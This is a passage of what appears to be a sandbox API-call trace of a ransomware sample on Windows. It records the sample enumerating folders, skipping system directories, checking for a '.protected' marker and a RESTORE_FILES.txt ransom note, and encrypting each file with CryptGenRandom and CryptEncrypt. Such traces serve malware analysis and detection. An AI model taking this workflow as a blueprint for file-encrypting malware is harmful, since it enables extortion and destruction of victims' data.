stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.151] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.151] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.151] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt") returned 107 [0093.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.151] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Windows") returned -1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files") returned -1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files (x86)") returned -1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="$Recycle.bin") returned 1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="System Volume Information") returned -1 [0093.151] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 89 [0093.151] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2=".") returned 1 [0093.151] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="..") returned 1 [0093.151] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned 91 [0093.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.151] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.151] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.151] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.151] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.151] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.151] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\.") returned 91 [0093.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.151] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.152] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.152] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\..") returned 92 [0093.152] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.152] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.152] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.152] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 95 [0093.152] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.152] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.152] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned 97 [0093.152] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.152] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.152] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.152] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.152] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.152] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\.") returned 97 [0093.152] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.152] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.152] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.152] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\..") returned 98 [0093.152] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.152] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.152] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.152] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0093.152] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0093.153] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0093.153] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0093.153] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 108 [0093.153] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0093.153] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0093.153] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.153] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.153] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.153] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt") returned 113 [0093.153] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.153] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.153] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.153] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.153] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt") returned 113 [0093.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.153] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0093.153] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 100 [0093.153] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0093.153] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.153] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.153] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.154] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="Windows") returned -1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="Program Files") returned -1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="Program Files (x86)") returned -1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="$Recycle.bin") returned 1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="System Volume Information") returned -1 [0093.154] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 104 [0093.154] StrStrIW (lpFirst="print_pref.ico", lpSrch=".protected") returned 0x0 [0093.154] lstrcmpW (lpString1="print_pref.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.154] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.154] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.154] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="Windows") returned -1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files") returned -1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files (x86)") returned -1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="$Recycle.bin") returned 1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="System Volume Information") returned -1 [0093.154] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 108 [0093.154] StrStrIW (lpFirst="print_property.ico", lpSrch=".protected") returned 0x0 [0093.154] lstrcmpW (lpString1="print_property.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.154] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.154] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.154] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="Windows") returned -1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files") returned -1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files (x86)") returned -1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="$Recycle.bin") returned 1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="System Volume Information") returned -1 [0093.155] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 105 [0093.155] StrStrIW (lpFirst="print_queue.ico", lpSrch=".protected") returned 0x0 [0093.155] lstrcmpW (lpString1="print_queue.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.155] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.155] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.155] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.155] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt") returned 107 [0093.155] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.155] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.155] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="Windows") returned -1 [0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files") returned 1 [0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files (x86)") returned 1 [0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="$Recycle.bin") returned 1 [0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="System Volume Information") returned -1 [0093.155] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 99 [0093.155] StrStrIW (lpFirst="scan_.ico", lpSrch=".protected") returned 0x0 [0093.155] lstrcmpW (lpString1="scan_.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.155] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.155] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.155] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.155] lstrcmpiW (lpString1="scan_property.ico", lpString2="Windows") returned -1 [0093.156] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files") returned 1 [0093.156] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files (x86)") returned 1 [0093.156] lstrcmpiW (lpString1="scan_property.ico", lpString2="$Recycle.bin") returned 1 [0093.156] lstrcmpiW (lpString1="scan_property.ico", lpString2="System Volume Information") returned -1 [0093.156] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 107 [0093.156] StrStrIW (lpFirst="scan_property.ico", lpSrch=".protected") returned 0x0 [0093.156] lstrcmpW (lpString1="scan_property.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.156] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Windows") returned -1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files") returned 1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files (x86)") returned 1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="$Recycle.bin") returned 1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="System Volume Information") returned -1 [0093.156] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 107 [0093.156] StrStrIW (lpFirst="scan_settings.ico", lpSrch=".protected") returned 0x0 [0093.156] lstrcmpW (lpString1="scan_settings.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.156] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0093.156] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0093.156] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 99 [0093.156] StrStrIW (lpFirst="tasks.xml", lpSrch=".protected") returned 0x0 [0093.156] lstrcmpW (lpString1="tasks.xml", lpString2="RESTORE_FILES.txt") returned 1 [0093.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.157] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.157] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.157] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt") returned 107 [0093.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\restore_files.txt"), dwDesiredAccess=0x40000000, 